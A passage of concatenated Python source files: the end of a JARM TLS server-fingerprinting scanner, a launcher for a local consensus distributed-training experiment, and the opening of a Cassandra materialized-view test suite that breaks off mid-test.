        tls1_2_forward = [dhost, destination_port, "TLS_1.2", "ALL", "FORWARD", "NO_GREASE", "APLN", "1.2_SUPPORT", "REVERSE"]
        tls1_2_reverse = [dhost, destination_port, "TLS_1.2", "ALL", "REVERSE", "NO_GREASE", "APLN", "1.2_SUPPORT", "FORWARD"]
        tls1_2_top_half = [dhost, destination_port, "TLS_1.2", "ALL", "TOP_HALF", "NO_GREASE", "APLN", "NO_SUPPORT", "FORWARD"]
        tls1_2_bottom_half = [dhost, destination_port, "TLS_1.2", "ALL", "BOTTOM_HALF", "NO_GREASE", "RARE_APLN", "NO_SUPPORT", "FORWARD"]
        tls1_2_middle_out = [dhost, destination_port, "TLS_1.2", "ALL", "MIDDLE_OUT", "GREASE", "RARE_APLN", "NO_SUPPORT", "REVERSE"]
        tls1_1_middle_out = [dhost, destination_port, "TLS_1.1", "ALL", "FORWARD", "NO_GREASE", "APLN", "NO_SUPPORT", "FORWARD"]
        tls1_3_forward = [dhost, destination_port, "TLS_1.3", "ALL", "FORWARD", "NO_GREASE", "APLN", "1.3_SUPPORT", "REVERSE"]
        tls1_3_reverse = [dhost, destination_port, "TLS_1.3", "ALL", "REVERSE", "NO_GREASE", "APLN", "1.3_SUPPORT", "FORWARD"]
        tls1_3_invalid = [dhost, destination_port, "TLS_1.3", "NO1.3", "FORWARD", "NO_GREASE", "APLN", "1.3_SUPPORT", "FORWARD"]
        tls1_3_middle_out = [dhost, destination_port, "TLS_1.3", "ALL", "MIDDLE_OUT", "GREASE", "APLN", "1.3_SUPPORT", "REVERSE"]
        #Possible versions: SSLv3, TLS_1, TLS_1.1, TLS_1.2, TLS_1.3
        #Possible cipher lists: ALL, NO1.3
        #GREASE: either NO_GREASE or GREASE
        #APLN: either APLN or RARE_APLN
        #Supported Verisons extension: 1.2_SUPPPORT, NO_SUPPORT, or 1.3_SUPPORT
        #Possible Extension order: FORWARD, REVERSE
        queue = [tls1_2_forward, tls1_2_reverse, tls1_2_top_half, tls1_2_bottom_half, tls1_2_middle_out, tls1_1_middle_out, tls1_3_forward, tls1_3_reverse, tls1_3_invalid, tls1_3_middle_out]
        jarm = ""
        #Assemble, send, and decipher each packet
        iterate = 0
        while iterate < len(queue):
            payload = packet_building(queue[iterate])
            server_hello, ip = send_packet(payload, dhost)
            #Deal with timeout error
            if server_hello == "TIMEOUT":
                jarm = "|||,|||,|||,|||,|||,|||,|||,|||,|||,|||"
                break
            ans = read_packet(server_hello, queue[iterate])
            jarm += ans
            iterate += 1
            if iterate == len(queue):
                break
            else:
                jarm += ","
        #Fuzzy hash
        result = jarm_hash(jarm)
        #Write to file
        if args.output:
            if ip != None:
                if args.json:
                    file.write('{"host":"' + dhost + '","ip":"' + ip + '","result":"' + result + '"')
                else:
                    # Fixed: CSV rows were prefixed with a stray '{"host":"'.
                    file.write(dhost + "," + ip + "," + result)
            else:
                if args.json:
                    # Fixed: JSON mode previously wrote a malformed mixed line
                    # for unresolved hosts; emit a proper null ip.
                    file.write('{"host":"' + dhost + '","ip":null,"result":"' + result + '"')
                else:
                    file.write(dhost + ",Failed to resolve IP," + result)
            #Verbose mode adds pre-fuzzy-hashed JARM
            if args.verbose:
                if args.json:
                    file.write(',"jarm":"' + jarm + '"')
                else:
                    file.write("," + jarm)
            if args.json:
                file.write("}")
            file.write("\n")
        #Print to STDOUT
        else:
            if ip != None:
                if args.json:
                    sys.stdout.write('{"host":"' + dhost + '","ip":"' + ip + '","result":"' + result + '"')
                else:
                    print("Domain: " + dhost)
                    print("Resolved IP: " + ip)
                    print("JARM: " + result)
            else:
                if args.json:
                    sys.stdout.write('{"host":"' + dhost + '","ip":null,"result":"' + result + '"')
                else:
                    print("Domain: " + dhost)
                    print("Resolved IP: IP failed to resolve.")
                    print("JARM: " + result)
            #Verbose mode adds pre-fuzzy-hashed JARM
            if args.verbose:
                if args.json:
                    sys.stdout.write(',"jarm":"' + jarm + '"')
                else:
                    scan_count = 1
                    for round in jarm.split(","):
                        print("Scan " + str(scan_count) + ": " + round, end="")
                        if scan_count == len(jarm.split(",")):
                            print("\n", end="")
                        else:
                            print(",")
                        scan_count += 1
            if args.json:
                sys.stdout.write("}\n")
        time.sleep(0.1)
        q.task_done()
# --- Command-line driver: configure proxy/output, then scan hosts from --input ---
# Set proxy (PySocks is required when --proxy is given; the actual SOCKS wiring
# presumably happens in the send path — TODO confirm socks is applied there)
if args.proxy:
    proxyhost, proxyport = args.proxy.split(':')
    proxyport = ParseNumber(proxyport)
    try:
        import socks
    except ImportError:
        print('Option proxy requires PySocks: pip install PySocks')
        exit()
# Set destination host and port (443 unless --port is given)
destination_host = args.scan
destination_port = int(args.port) if args.port else 443
# Output format: JSON or CSV
file_ext = ".json" if args.json else ".csv"
# File output option: append the proper extension unless it is already present
if args.output:
    if args.output.endswith(file_ext):
        output_file = args.output
    else:
        output_file = args.output + file_ext
    # NOTE: 'file' is deliberately module-level; the worker threads write to it.
    file = open(output_file, "a+")
if args.input:
    # Close the input file as soon as the host list is read.
    with open(args.input, "r") as input_file:
        entries = input_file.readlines()
    q = Queue(maxsize=0)
    # Change the variable below to increase the number of threads if desired
    num_threads = 8
    for i in range(num_threads):
        worker = Thread(target=main, args=(q,))
        worker.daemon = True  # setDaemon() is deprecated since Python 3.10
        worker.start()
    for entry in entries:
        # Each line is either "host" or "host,port"
        port_check = entry.split(",")
        if len(port_check) == 2:
            # strip() also copes with a missing trailing newline on the last
            # line, which the previous [:-1] slicing did not.
            destination_port = int(port_check[1].strip())
            destination_host = port_check[0]
        else:
            destination_host = entry.strip()
        q.put(destination_host)
    q.join()
else:
    print('This jarm version can only be executed using the --input option')
# Close files
if args.output:
    file.close()
|
run_consensus.py | import argparse
import asyncio
import threading
import sys
import os
import time
sys.path.append('./distributed-learning/')
from utils.consensus_tcp import ConsensusMaster
import consensus_trainer
import consensus_master
# CLI for launching a local consensus-training experiment: one master process
# plus world-size trainer agents connected by the chosen topology.
parser = argparse.ArgumentParser()
# Either give --world-size together with a named --topology, or supply an
# explicit edge list via --topology-file (see make_topology()).
parser.add_argument('--world-size', '-n', type=int,
                    help='You should either specify both world-size and topology'
                         ' or use custom topology using topology-file option')
parser.add_argument('--topology', choices=['mesh', 'star', 'ring', 'torus', 'expander'], type=str)
parser.add_argument('--topology-file', type=str)
parser.add_argument('--validation-agents', type=str, help='e.g. --validation-agents="0,3,6" or --validation-agents="*"')
parser.add_argument('--do-resume', dest='do_resume', help='resume from checkpoint', action='store_true')
parser.add_argument('--consensus-freq', dest='consensus_frequency', type=int, default=1,
                    help='freq>0 -> do averaging <freq> times per batch, '
                         'freq<0 -> do averaging once per (-freq) batches')
parser.add_argument('--telemetry-freq-per-epoch', dest='telemetry_freq_per_epoch', type=int, default=3,
                    help='how many times to send telemetry to master per epoch')
# parser.add_argument('--use-consensus-rounds', dest='use_consensus_rounds', action='store_true',
#                     help='do consensus rounds instead of fixed number of consensus iterations')
# parser.add_argument('--consensus-rounds-precision', dest='consensus_rounds_precision', type=float, default=1e-4)
parser.add_argument('--use-lsr', dest='use_lsr', action='store_true')
parser.add_argument('--warmup', dest='warmup', default=0, type=int)
parser.add_argument('--momentum-consensus', dest='momentum_consensus', action='store_true')
parser.add_argument('-b', '--batch-size', default=32, type=int,
                    metavar='N', help='mini-batch size (default: 32)')
# Networking: master address, and the first port of the per-agent port range
# (agent k listens on agent-start-port + k).
parser.add_argument('--master-host', default='127.0.0.1', type=str)
parser.add_argument('--master-port', default=8999, type=int)
parser.add_argument('--agent-start-port', default=11000, type=int)
parser.add_argument('--debug', dest='debug', action='store_true')
parser.add_argument('--print-freq', '-p', default=50, type=int,
                    metavar='N', help='print frequency (default: 50)')
def make_topology(args):
    """Build the agent communication graph.

    Returns a tuple ``(edges, n)`` where ``edges`` is a list of ``(u, v)``
    agent-index pairs and ``n`` is the number of agents. Either both
    ``--world-size`` and ``--topology`` must be given, or ``--topology-file``
    must point to an edge-list file; otherwise ValueError is raised.
    """
    usage_error = 'You should either specify both world-size and topology'\
                  ' or use custom topology using topology-file option'
    if args.world_size is not None and args.topology is not None:
        size = args.world_size
        kind = args.topology
        if kind == 'mesh':
            # Complete graph: every unordered pair once.
            return [(a, b) for a in range(size) for b in range(a + 1, size)], size
        if kind == 'star':
            # Agent 0 is the hub.
            return [(0, b) for b in range(1, size)], size
        if kind == 'ring':
            return [(a, (a + 1) % size) for a in range(size)], size
        if kind == 'torus':
            side = int(size ** 0.5)
            if side * side != size:
                raise ValueError('topology=torus => world size must be exact square')
            # side x side grid with wrap-around rings along both axes.
            horizontal = [((row * side + col),
                           (row * side + (col + 1) % side))
                          for col in range(side) for row in range(side)]
            vertical = [((row * side + col),
                         ((row + 1) % side * side + col))
                        for col in range(side) for row in range(side)]
            return horizontal + vertical, size
        if kind == 'expander':
            import networkx as nx
            side = int(size ** 0.5)
            if side * side != size:
                raise ValueError('topology=expander => world size must be exact square')
            # Margulis-Gabber-Galil expander on the side x side grid.
            G = nx.generators.expanders.margulis_gabber_galil_graph(side)
            return [(side * u[0] + u[1], side * v[0] + v[1]) for u, v in G.edges()], size
        raise ValueError(usage_error)
    if args.topology_file is not None:
        with open(args.topology_file, 'r') as f:
            file_fmt_help = 'File should look like this:\n'\
                            '0 1\n'\
                            '1 2\n'\
                            '2 0\n\n'\
                            'Agent designations must be integers from 0 to n-1 where n is the total number of agents'
            edges = []
            seen = set()
            try:
                for raw in f.readlines():
                    fields = list(map(int, raw.strip().split()))
                    if not fields:
                        continue  # skip blank lines
                    if len(fields) != 2:
                        raise ValueError('File is ill-formated')
                    u, v = fields
                    seen.add(u)
                    seen.add(v)
                    edges.append((u, v))
                # Agent ids must form a contiguous 0..n-1 range.
                for agent in range(len(seen)):
                    if agent not in seen:
                        raise ValueError('File is ill-formated')
            except Exception as e:
                print(f'{e} happened while reading the topology file.\n' + file_fmt_help)
                raise e
            return edges, len(seen)
    raise ValueError(usage_error)
def extract_validation_agents(args, total_agents):
    """Parse the --validation-agents option into a list of agent tokens.

    ``None`` means no validation agents, ``'*'`` means every agent, and
    otherwise the value is a comma-separated list of integer tokens.
    """
    spec = args.validation_agents
    if spec is None:
        return []
    if spec == '*':
        return list(range(total_agents))
    try:
        return [int(tok) for tok in spec.strip().split(',')]
    except Exception as e:
        print('validation-agents option should look like this: "0" or "0,3,6" or "*"')
        raise e
def run(args):
    """Launch the consensus master and one trainer thread per agent, then
    block until every agent finishes and shut the master loop down.

    Each thread owns a private asyncio event loop; the master and all agents
    communicate over TCP on localhost ports derived from *args*.
    """
    topology, total_agents = make_topology(args)

    def make_master_task():  # actually returns a Future object
        # Telemetry is checkpointed next to the model state; resume=True keeps
        # previously collected telemetry across restarts.
        telemetry_processor = consensus_master.ResNet20TelemetryProcessor(
            os.path.join(os.environ['CHECKPOINT_PATH'], 'telemetry.pickle'),
            topology, resume=args.do_resume)
        master = ConsensusMaster(topology, '127.0.0.1', args.master_port,
                                 debug=True if args.debug else False,
                                 telemetry_processor=telemetry_processor)
        return master.serve_forever()

    def run_task(loop, task):
        # Run *task* to completion on *loop* inside the current thread.
        asyncio.set_event_loop(loop)
        loop.run_until_complete(task)
        loop.close()

    master_loop = asyncio.new_event_loop()
    master_task = make_master_task()
    master_thread = threading.Thread(target=run_task, args=(master_loop, master_task))
    master_thread.start()
    time.sleep(5.0)  # let master initialize

    validation_agents = extract_validation_agents(args, total_agents)

    agent_threads = []
    for token in range(total_agents):
        # Translate our CLI options into a consensus_trainer argv for agent
        # <token>. NOTE(review): --agent-host is set to args.master_host —
        # presumably all agents run on the master's host; confirm if agents
        # are ever remote.
        cfg = consensus_trainer.make_config_parser()
        agent_args = cfg.parse_args([
            '--agent-token', f'{token}',
            '--agent-host', f'{args.master_host}',
            '--agent-port', f'{args.agent_start_port + token}',
            '--master-host', f'{args.master_host}',
            '--master-port', f'{args.master_port}',
            '--total-agents', f'{total_agents}',
            '--save-dir', os.environ['CHECKPOINT_PATH'],
            '--use-prepared-data',
            '--print-freq', f'{args.print_freq}'
        ]
            + (['--do-resume'] if args.do_resume else [])
            + (['--consensus-freq', f'{args.consensus_frequency}']
               if args.consensus_frequency is not None else [])
            + (['--telemetry-freq-per-epoch', f'{args.telemetry_freq_per_epoch}']
               if args.telemetry_freq_per_epoch is not None else [])
            # + (['--use-consensus-rounds'] if args.use_consensus_rounds is not None else [])
            # + (['--consensus-rounds-precision', f'{args.consensus_rounds_precision}']
            #    if args.consensus_rounds_precision is not None else [])
            + (['--use-lsr'] if args.use_lsr else [])
            + ([f'--warmup', f'{args.warmup}'] if args.warmup is not None else [])
            + (['--momentum-consensus'] if args.momentum_consensus else [])
            + (['--batch-size', f'{args.batch_size}'] if args.batch_size is not None else [])
            # Agent 0 leads initialization and writes the log.
            + (['--init-leader', '--enable-log'] if token == 0 else [])
            + (['--debug-consensus'] if args.debug else [])
            + ([] if token in validation_agents else ['--no-validation'])
        )
        loop = asyncio.new_event_loop()
        thread = threading.Thread(target=run_task, args=(loop, consensus_trainer.main(agent_args)))
        thread.start()
        agent_threads.append(thread)

    for t in agent_threads:
        t.join()
    # All agents are done: stop the master's serve_forever loop from outside
    # its thread, then wait for the thread to exit.
    master_loop.call_soon_threadsafe(master_loop.stop)
    master_thread.join()
if __name__ == '__main__':
    # Parse CLI options and launch the master plus all agent threads.
    args = parser.parse_args()
    run(args)
|
materialized_views_test.py | import collections
import re
import sys
import time
import traceback
import pytest
import threading
import logging
from flaky import flaky
from enum import Enum
from queue import Empty
from functools import partial
from multiprocessing import Process, Queue
from cassandra import ConsistencyLevel, InvalidRequest, WriteFailure
from cassandra.cluster import NoHostAvailable
from cassandra.concurrent import execute_concurrent_with_args
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from distutils.version import LooseVersion
from dtest import Tester, get_ip_from_node, create_ks, mk_bman_path
from tools.assertions import (assert_all, assert_crc_check_chance_equal,
assert_invalid, assert_none, assert_one,
assert_unavailable)
from tools.data import rows_to_list
from tools.misc import new_node
from tools.jmxutils import (JolokiaAgent, make_mbean)
since = pytest.mark.since
logger = logging.getLogger(__name__)
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
@flaky
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
def _rows_to_list(self, rows):
    """Convert each driver result row into a plain list of column values."""
    return [list(row) for row in rows]
def prepare(self, user_table=False, rf=1, options=None, nodes=3, install_byteman=False, **kwargs):
    """Start an MV-enabled cluster and return a session on node1.

    Creates keyspace 'ks' with replication factor *rf*; when *user_table* is
    True also creates the 'users' table and its users_by_state view.
    Extra **kwargs are forwarded to patient_cql_connection (e.g.
    consistency_level).
    """
    cluster = self.cluster
    cluster.set_configuration_options({'enable_materialized_views': 'true'})
    # Single datacenter with *nodes* nodes (the second list entry is dc2, empty).
    cluster.populate([nodes, 0], install_byteman=install_byteman)
    if options:
        cluster.set_configuration_options(values=options)
    cluster.start()
    node1 = cluster.nodelist()[0]
    session = self.patient_cql_connection(node1, **kwargs)
    create_ks(session, 'ks', rf)

    if user_table:
        session.execute(
            ("CREATE TABLE users (username varchar, password varchar, gender varchar, "
             "session_token varchar, state varchar, birth_year bigint, "
             "PRIMARY KEY (username));")
        )

        # create a materialized view
        session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
                         "SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
                         "PRIMARY KEY (state, username)"))

    return session
def update_view(self, session, query, flush, compact=False):
    """Execute *query*, replay batchlogs so views catch up, then optionally
    flush and/or compact every node in the cluster."""
    session.execute(query)
    self._replay_batchlogs()
    for wanted, action in ((flush, self.cluster.flush), (compact, self.cluster.compact)):
        if wanted:
            action()
def _settle_nodes(self):
    """Replay batchlogs, then wait (up to ~5s per node) until every thread
    pool on every running node reports no active or pending tasks."""
    logger.debug("Settling all nodes")
    # Matches one data row of `nodetool tpstats` output.
    stage_match = re.compile(r"(?P<name>\S+)\s+(?P<active>\d+)\s+(?P<pending>\d+)\s+(?P<completed>\d+)\s+(?P<blocked>\d+)\s+(?P<alltimeblocked>\d+)")

    def _settled_stages(node):
        # True when no pool on *node* has work in flight.
        (stdout, stderr, rc) = node.nodetool("tpstats")
        lines = re.split("\n+", stdout)
        for line in lines:
            match = stage_match.match(line)
            if match is not None:
                active = int(match.group('active'))
                pending = int(match.group('pending'))
                if active != 0 or pending != 0:
                    logger.debug("%s - pool %s still has %d active and %d pending" % (node.name, match.group("name"), active, pending))
                    return False
        return True

    for node in self.cluster.nodelist():
        if node.is_running():
            node.nodetool("replaybatchlog")
            attempts = 50  # 100 milliseconds per attempt, so 5 seconds total
            while attempts > 0 and not _settled_stages(node):
                time.sleep(0.1)
                attempts -= 1
def _build_progress_table(self):
    """Name of the system table tracking in-progress view builds.

    The table was renamed (views_builds -> view_builds) in Cassandra 4.0.
    """
    on_4_plus = self.cluster.version() >= '4'
    return 'system.view_builds_in_progress' if on_4_plus else 'system.views_builds_in_progress'
def _wait_for_view(self, ks, view):
    """Block until the build of view *ks*.*view* finishes on every running
    node, raising RuntimeError after 50 seconds per node."""
    logger.debug("waiting for view")

    def _view_build_finished(node):
        # The build is done once its progress row disappears from the
        # in-progress system table.
        s = self.patient_exclusive_cql_connection(node)
        query = "SELECT * FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
                (self._build_progress_table(), ks, view)
        result = list(s.execute(query))
        return len(result) == 0

    for node in self.cluster.nodelist():
        if node.is_running():
            attempts = 50  # 1 sec per attempt, so 50 seconds total
            while attempts > 0 and not _view_build_finished(node):
                time.sleep(1)
                attempts -= 1
            if attempts <= 0:
                raise RuntimeError("View {}.{} build not finished after 50 seconds.".format(ks, view))
def _wait_for_view_build_start(self, session, ks, view, wait_minutes=2):
    """Wait for the start of a MV build, ensuring that it has saved some progress.

    Polls the build-progress system table until at least one progress row for
    *ks*.*view* appears; fails the test after *wait_minutes* minutes.
    """
    start = time.time()
    while True:
        try:
            query = "SELECT COUNT(*) FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
                    (self._build_progress_table(), ks, view)
            result = list(session.execute(query))
            assert 0 == result[0].count
        except AssertionError:
            # Progress has been saved -> the build has started.
            break

        elapsed = (time.time() - start) / 60
        if elapsed > wait_minutes:
            # Report the configured timeout (the message used to hard-code
            # "2 minutes" regardless of wait_minutes).
            pytest.fail("The MV build hasn't started in {} minutes.".format(wait_minutes))
        time.sleep(0.1)  # avoid hammering the node with back-to-back queries
def _insert_data(self, session):
    """Insert the four fixed 'users' rows and wait for all nodes to settle."""
    insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
    value_rows = [
        "('user1', 'ch@ngem3a', 'f', 'TX', 1968);",
        "('user2', 'ch@ngem3b', 'm', 'CA', 1971);",
        "('user3', 'ch@ngem3c', 'f', 'FL', 1978);",
        "('user4', 'ch@ngem3d', 'm', 'TX', 1974);",
    ]
    for values in value_rows:
        session.execute(insert_stmt + values)
    self._settle_nodes()
def _replay_batchlogs(self):
    """Force batchlog replay on every running node and assert the node's
    batchlog table is left empty afterwards."""
    for node in self.cluster.nodelist():
        if node.is_running():
            logger.debug("Replaying batchlog on node {}".format(node.name))
            node.nodetool("replaybatchlog")
            # CASSANDRA-13069 - Ensure replayed mutations are removed from the batchlog
            node_session = self.patient_exclusive_cql_connection(node)
            result = list(node_session.execute("SELECT count(*) FROM system.batches;"))
            assert result[0].count == 0
def _assert_view_meta(self, session, views, exists=True, nodes=2):
    """Check the view bookkeeping tables.

    When *exists* is True, expect *views* entries in system.built_views (and
    one build-status row per view per node on 3.11+); otherwise expect all
    view metadata to be cleared. In both cases no build may be in progress.
    """
    if exists:
        assert_one(session, "SELECT COUNT(*) FROM system.built_views", [views])
        if self.cluster.version() >= '3.11':
            assert_one(session, "SELECT COUNT(*) FROM system_distributed.view_build_status", [views * nodes])
    else:
        assert_none(session, "SELECT * FROM system.built_views")
        if self.cluster.version() >= '3.11':
            assert_none(session, "SELECT * FROM system_distributed.view_build_status")
    assert_none(session, "SELECT * FROM {}".format(self._build_progress_table()))
def test_view_metadata_cleanup(self):
    """
    drop keyspace or view should clear built_views and view_build_status
    """
    session = self.prepare(rf=2, nodes=2)

    def populate_data(session, rows):
        logger.debug("populate base data")
        for v in range(rows):
            session.execute("INSERT INTO t(k,c,a,b,e,f) VALUES({v},{v},{v},{v},{v},{v})".format(v=v))

    def verify_data(session, rows, views):
        logger.debug("verify view data")
        for v in range(rows):
            for view in range(views):
                assert_one(session, "SELECT * FROM mv{} WHERE k={v} AND c={v}".format(view, v=v), [v, v, v, v, v, v])

    def create_keyspace(session, ks="ks1", rf=2):
        create_ks(session, ks, rf)

    def create_table(session):
        logger.debug("create base table")
        session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")

    def create_views(session, views, keyspace="ks1"):
        logger.debug("create view")
        for view in range(views):
            session.execute("CREATE MATERIALIZED VIEW mv{} AS SELECT * FROM t "
                            "WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c,k)".format(view),
                            timeout=60)
            self._wait_for_view(keyspace, "mv{}".format(view))

    def drop_keyspace(session, keyspace="ks1"):
        logger.debug("drop keyspace {}".format(keyspace))
        session.execute("DROP KEYSPACE IF EXISTS {}".format(keyspace),
                        timeout=60)

    def drop_views(session, views):
        logger.debug("drop all views")
        for view in range(views):
            session.execute("DROP MATERIALIZED VIEW IF EXISTS mv{}".format(view))

    rows = 100
    views = 5

    # Case 1: dropping the whole keyspace must clear all view metadata.
    create_keyspace(session)
    create_table(session)
    populate_data(session, rows)
    create_views(session, views)
    verify_data(session, rows, views)

    self._assert_view_meta(session, views)
    drop_keyspace(session)
    self._assert_view_meta(session, views, exists=False)

    # Case 2: dropping just the views must clear the metadata too.
    create_keyspace(session)
    create_table(session)
    populate_data(session, rows)
    create_views(session, views)
    verify_data(session, rows, views)

    self._assert_view_meta(session, views)
    drop_views(session, views)
    self._assert_view_meta(session, views, exists=False)
def test_create(self):
    """Test the materialized view creation"""
    session = self.prepare(user_table=True)

    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    # Message previously read "Expecting 1 materialized view == got..." — a
    # garbled separator; use the same format style as the other assertions.
    assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
def test_gcgs_validation(self):
    """Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
    session = self.prepare(user_table=True)

    # Shouldn't be able to alter the gc_grace_seconds of the base table to 0
    assert_invalid(session,
                   "ALTER TABLE users WITH gc_grace_seconds = 0",
                   "Cannot alter gc_grace_seconds of the base table of a materialized view "
                   "to 0, since this value is used to TTL undelivered updates. Setting "
                   "gc_grace_seconds too low might cause undelivered updates to expire "
                   "before being replayed.")
    # But can alter the gc_grace_seconds of the base table to a value != 0
    session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")

    # Shouldn't be able to alter the gc_grace_seconds of the MV to 0
    assert_invalid(session,
                   "ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
                   "Cannot alter gc_grace_seconds of a materialized view to 0, since "
                   "this value is used to TTL undelivered updates. Setting gc_grace_seconds "
                   "too low might cause undelivered updates to expire before being replayed.")

    # Now let's drop MV
    session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")

    # Now we should be able to set the gc_grace_seconds of the base table to 0
    session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")

    # Now we shouldn't be able to create a new MV on this table
    assert_invalid(session,
                   "CREATE MATERIALIZED VIEW users_by_state AS "
                   "SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
                   "PRIMARY KEY (state, username)",
                   "Cannot create materialized view 'users_by_state' for base table 'users' "
                   "with gc_grace_seconds of 0, since this value is used to TTL undelivered "
                   "updates. Setting gc_grace_seconds too low might cause undelivered updates"
                   " to expire before being replayed.")
def test_insert(self):
    """Test basic insertions"""
    session = self.prepare(user_table=True)

    self._insert_data(session)

    # The assertion messages previously used format(4 == len(result)), which
    # rendered True/False instead of the expected/actual counts.
    result = list(session.execute("SELECT * FROM users;"))
    assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))

    result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
    assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))

    result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
    assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))

    result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
    assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_populate_mv_after_insert(self):
    """Test that a view is OK when created with existing data"""
    session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")

    for i in range(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))

    # Creating the view after the inserts triggers a build over existing rows.
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
                     "AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("wait for view to build")
    self._wait_for_view("ks", "t_by_v")

    logger.debug("wait that all batchlogs are replayed")
    self._replay_batchlogs()

    for i in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
@pytest.mark.xfail(reason="Should be addressed with CASSANDRA-15845")
@since('4.0')
def test_populate_mv_after_insert_wide_rows_version40(self):
    # Re-run the wide-rows scenario on 4.0+ (expected to fail until 15845).
    self.test_populate_mv_after_insert_wide_rows()
@since('3.0', max_version='3.X')
def test_populate_mv_after_insert_wide_rows(self):
    """Test that a view is OK when created with existing data with wide rows"""
    session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)

    session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")

    # 5 partitions x 10000 clustering rows each.
    for i in range(5):
        for j in range(10000):
            session.execute("INSERT INTO t (id, v) VALUES ({}, {})".format(i, j))

    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
                     "AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("wait for view to build")
    self._wait_for_view("ks", "t_by_v")

    logger.debug("wait that all batchlogs are replayed")
    self._replay_batchlogs()
    for i in range(5):
        for j in range(10000):
            assert_one(session, "SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, j), [j, i])
def test_crc_check_chance(self):
    """Test that crc_check_chance parameter is properly populated after mv creation and update"""
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    # Set at creation time...
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
                     "AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))

    assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)

    # ...and updated via ALTER MATERIALIZED VIEW.
    session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")

    assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def test_prepared_statement(self):
    """Test basic insertions with prepared statement"""
    session = self.prepare(user_table=True)

    insertPrepared = session.prepare(
        "INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
    )

    selectPrepared = session.prepare(
        "SELECT state, password, session_token FROM users_by_state WHERE state=?;"
    )

    # insert data
    session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
    session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
    session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
    session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))

    result = list(session.execute("SELECT * FROM users;"))
    assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))

    # Query the view through the prepared select, one state at a time.
    result = list(session.execute(selectPrepared.bind(['TX'])))
    assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))

    result = list(session.execute(selectPrepared.bind(['CA'])))
    assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))

    result = list(session.execute(selectPrepared.bind(['MA'])))
    assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_immutable(self):
    """Test that a materialized view is immutable"""
    session = self.prepare(user_table=True)

    # cannot insert
    assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
                   "Cannot directly modify a materialized view")

    # cannot update
    assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
                   "Cannot directly modify a materialized view")

    # cannot delete a row
    assert_invalid(session, "DELETE from users_by_state where state='TX';",
                   "Cannot directly modify a materialized view")

    # cannot delete a cell
    assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
                   "Cannot directly modify a materialized view")

    # cannot alter a table
    assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
                   "Cannot use ALTER TABLE on Materialized View")
def test_drop_mv(self):
    """Test that we can drop a view properly"""
    session = self.prepare(user_table=True)

    # create another materialized view
    session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
                     "SELECT * FROM users WHERE birth_year IS NOT NULL AND "
                     "username IS NOT NULL PRIMARY KEY (birth_year, username)"))

    result = list(session.execute(("SELECT * FROM system_schema.views "
